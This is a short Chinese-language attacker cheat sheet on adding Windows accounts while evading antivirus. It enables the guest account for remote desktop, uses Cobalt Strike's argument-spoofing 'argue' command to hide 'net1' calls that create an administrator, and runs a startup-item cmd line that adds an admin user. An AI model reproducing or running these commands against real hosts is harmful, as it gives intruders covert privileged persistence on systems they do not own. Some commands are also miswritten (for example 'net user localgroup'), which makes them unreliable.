Win绕过AV添加账号
- 开启来宾用户
net user guest /active:yes
net user localgroup “Remote Desktop User” guest /add
由于无法直接添加管理员组,所以为了远程连接,添加到远程连接组
- CS的argue命令参数污染。
argue net1 xxxxx
execute net1 user test /add
execute net1 localgroup administrators test /add
- 添加优先级高于AV的启动项
C:/windows/system32/cmd.exe /c net user test /add;net localgroup administrators test /add